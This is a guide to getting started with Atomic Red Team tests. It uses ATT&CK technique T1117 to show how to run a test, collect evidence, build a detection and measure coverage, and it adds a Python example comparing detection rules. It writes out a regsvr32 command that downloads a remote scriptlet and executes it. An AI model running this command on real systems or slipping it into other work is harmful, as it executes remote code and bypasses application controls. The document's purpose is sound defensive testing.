Getting Started Testing with Atomic Tests

We suggest a phased approach to running a test and evaluating your results:

  1. Select a test
  2. Execute Test
  3. Collect Evidence
  4. Develop Detection
  5. Measure Progress

Best Practices

Select a test

Select one or more Atomic Tests that you plan to execute. A complete list, ATT&CK matrices, and platform-specific matrices linking to Atomic Tests can be found here:

Execute Test

In this example we will use Technique T1117 "Regsvr32" and Atomic Test "Regsvr32 remote COM scriptlet execution". This particular test is fairly easy to exercise since the tool is on all Windows workstations by default.

The details of this test, which are located here, describe how you can test your detection by running the command below:

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll

Collect Evidence

What does your security solution observe?

This is why we test! We want to identify visibility gaps and determine where we need to make improvements.

[Figures: RC Timeline; Cb example 1; Cb Example 2]

Develop Detection

So you executed the test and none of your defenses fired – that’s why we test! Based on your observations and detection capabilities, it is time to use what you have to try to detect this event in your environment.

[Figure: Unwind Data]

Once the detection is built, it is time to validate that the detection is working and that it is appropriately tuned. If you write your detection too broadly and “detect” every regsvr32.exe without any suppression, you are going to be digging out from a mountain of false positives. But if you write it too narrowly and it only detects regsvr32.exe with the exact command line /s /u /i, then all an attacker has to do is slightly modify their command line to evade your detection.
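The trade-off described above can be seen by running three candidate rules over the same events. This is an added example, not code from the Atomic Red Team project: the event list is constructed, the example.invalid URL and ExampleVendor paths are placeholders, and the "tuned" rule (key on a URL passed to /i: rather than on the exact string) is one assumed way to tune, not the project's detection.

```python
import re

# Constructed process-creation events: (label, image path, command line).
SYS32 = "C:\\Windows\\System32\\regsvr32.exe"
EVENTS = [
    ("atomic_test", SYS32,
     "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/"
     "atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"),
    # Same behaviour, switches reordered and upper-cased.
    ("reordered_variant", SYS32,
     "REGSVR32.EXE /u /s /I:https://example.invalid/test.sct SCROBJ.DLL"),
    # Routine administrative use: local DLL/OCX registration.
    ("benign_register", SYS32,
     r'regsvr32.exe /s "C:\Program Files\ExampleVendor\plugin.dll"'),
    ("benign_unregister", SYS32,
     r"regsvr32.exe /s /u C:\Windows\System32\example.ocx"),
]


def is_regsvr32(image):
    return image.lower().endswith("\\regsvr32.exe")


def too_broad(image, cmdline):
    """Fires on every regsvr32.exe execution."""
    return is_regsvr32(image)


def too_narrow(image, cmdline):
    """Fires only on the literal switch string used by the test."""
    return is_regsvr32(image) and "/s /u /i" in cmdline


# An /i: switch whose value is an http(s) URL, in any case and any position.
REMOTE_I = re.compile(r'(?:^|\s)/i:"?https?://', re.IGNORECASE)


def tuned(image, cmdline):
    """Fires when regsvr32.exe is handed a remote URL through /i:."""
    return is_regsvr32(image) and bool(REMOTE_I.search(cmdline))


def evaluate(rule):
    """Return the labels of the events a rule fires on."""
    return [label for label, image, cmd in EVENTS if rule(image, cmd)]


if __name__ == "__main__":
    for rule in (too_broad, too_narrow, tuned):
        print(f"{rule.__name__:10} -> {evaluate(rule)}")
```

Replace EVENTS with process-creation records exported from your own telemetry to see how each rule behaves against real baseline activity before deploying it.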

Measure Progress

One of the goals is to try to measure your coverage/capabilities against the ATT&CK Matrix and to identify where you may have gaps. Roberto Rodriguez (@cyb3rWar0g) provided this spreadsheet and complementary blog post showcasing how to determine where you stand within your organization in relation to the MITRE ATT&CK Matrix.

[Figures: HeatMap; Measure]